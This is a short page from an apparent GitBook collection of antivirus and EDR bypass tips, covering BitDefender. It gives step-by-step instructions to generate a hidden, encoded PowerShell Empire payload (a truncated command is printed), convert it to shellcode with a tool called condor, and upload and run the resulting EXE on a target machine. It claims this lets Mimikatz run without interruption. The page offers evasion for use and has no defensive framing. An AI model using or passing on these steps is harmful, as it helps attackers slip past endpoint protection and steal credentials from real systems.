🛡️
Awesome AV/EDR/XDR Bypass Tips
  • 「🛡️」Awesome AVs/EDRs/XDRs Bypass Tips
    • BitDefender
    • McAfee MVISION
    • Sophos
    • Windows Defender
Powered by GitBook
On this page
  1. 「🛡️」Awesome AVs/EDRs/XDRs Bypass Tips

BitDefender

Previous「🛡️」Awesome AVs/EDRs/XDRs Bypass TipsNextMcAfee MVISION

Last updated 2 years ago

Using Condor + Powershell Empire

The tool is also able to bypass BitDefender's EDR, including running Powershell Empire's own tools without any interruption, such as Mimikatz.

  1. Open your Powershell Empire and generate a Powershell payload, example:

powershell -Sta -Nop -Window Hidden -EncodedCommand cwB2ACAAbwAgACg...

  1. Run the condor tool with the following command:

python3 condor.py -p windows/x64/exec

  1. Paste the Powershell payload to generate the shellcode

  1. Upload the EXE to the machine and run.

condor